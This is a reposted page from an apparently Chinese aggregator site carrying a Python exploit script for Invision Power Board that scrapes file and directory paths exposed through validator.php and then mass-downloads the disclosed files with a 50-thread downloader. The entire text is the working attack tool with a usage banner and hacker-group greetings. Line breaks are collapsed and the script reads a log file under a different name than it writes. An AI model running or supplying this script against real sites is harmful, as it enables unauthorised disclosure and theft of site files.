Invision Power Board remote file disclosure exploit.
来源:互联网 发布:广数系统g76螺纹编程 编辑:程序博客网 时间:2024/06/05 10:05
#! /usr/bin/env python3.1################################################################ # _____ _____ ____ (validator.php) ## |_ _| __ /| _ / ## | | | |__) | |_) | ## | | | ___/| _ < ## _| |_| | | |_) | ## |_____|_| |____/ ## @expl0it... ################################################################# # [ IPB Files / Directories Full Disclosure ] # # [ Vuln discovered by TinKode / xpl0it written by cmiN ] ## [ Greetz: insecurity.ro, darkc0de.com ] ################################################################# # ## Special thanks for: cmiN ## www.TinKode.BayWords.com #################################################################import os, sys, urllib.request, urllib.parse, threadingdef main(): logo = """/t |---------------------------------------------------------------|/t | _____ _____ ____ (TM) |/t | |_ _| __ /| _ / |/t | | | | |__) | |_) | |/t | | | | ___/| _ < |/t | _| |_| | | |_) | |/t | |_____|_| |____/ |/t | |/t | |/t | IPB Full Disclosure expl0it |/t | Written by cmiN |/t | Vulnerability discovered by TinKode |/t | |/t | |/t | Visit: www.insecurity.ro & www.darkc0de.com |/t |---------------------------------------------------------------|""" usage = """ |---------------------------------------------------------------| |Usage: ipbfd.py scan http://www.site.com/IPB_folder | | ipbfd.py download *.zip -> all | | ipbfd.py download name.jpg -> one | |---------------------------------------------------------------|""" if sys.platform in ("linux", "linux2"): clearing = "clear" else: clearing = "cls" os.system(clearing) print(logo) args = sys.argv if len(args) == 3: try: print("Please wait...") if args[1] == "scan": extract_parse_save(args[2].strip("/")) elif args[1] == "download": download_data(args[2]) except Exception as message: print("An error occurred: {}".format(message)) except: print("Unknown error.") else: print("Ready!") else: print(usage) input()def extract_parse_save(url): print("[+]Extracting content...") hurl = url + "/validator.php" with urllib.request.urlopen(hurl) as usock: source = usock.read().decode() print("[+]Finding token...") word = "validate('" index = source.find(word) if index != -1: source = source[index + len(word):] value = source[:source.index("'")] hurl = url + "/validator.php?op={}".format(value) else: print("[!]Token not found.") print("[+]Obtaining paths...") with urllib.request.urlopen(hurl) as usock: lastk, lastv = None, None dictionary = dict() for line in usock: line = line.decode() index = line.find("<td>") if index != -1: lastk = line[index + 4:line.index("</td>")].strip(" ").strip(" ") index = line.find("<strong>") if index != -1: lastv = line[index + 8:line.index("</strong>")].strip(" ") if lastk != None and lastv != None: index = lastk.rfind(".") if index in (-1, 0): lastk = "[other] {}".format(lastk) else: lastk = "[{}] {}".format(lastk[index + 1:], lastk) dictionary[lastk] = lastv lastk, lastv = None, None print("[+]Organizing and saving paths...") with open("IPBlogs.txt", "w") as fout: fout.write(url + "/n") keys = sorted(dictionary.keys()) for key in keys: fout.write("{} ({})/n".format(key, dictionary[key]))def download_data(files): print("[+]Searching and downloading files...") mthreads = 50 with open("vBlogs.txt", "r") as fin: url = fin.readline().strip("/n").strip("/") if files.find("*") == -1: hurl = url + "/" + files.strip("/") Download(hurl).start() else: ext = files[files.rindex(".") + 1:] for line in fin: pieces = line.strip("/n").split(" ") if pieces[0].count(ext) == 1: upath = pieces[1] hurl = url + "/" + upath.strip("/") while threading.active_count() > mthreads: pass Download(hurl).start() while threading.active_count() > 1: passclass Download(threading.Thread): def __init__(self, url): threading.Thread.__init__(self) self.url = url def run(self): try: with urllib.request.urlopen(self.url) as usock: data = usock.read() uparser = urllib.parse.urlparse(usock.geturl()) pieces = uparser.path.split("/") fname = pieces[len(pieces) - 1] with open(fname, "wb") as fout: fout.write(data) except: passif __name__ == "__main__": main()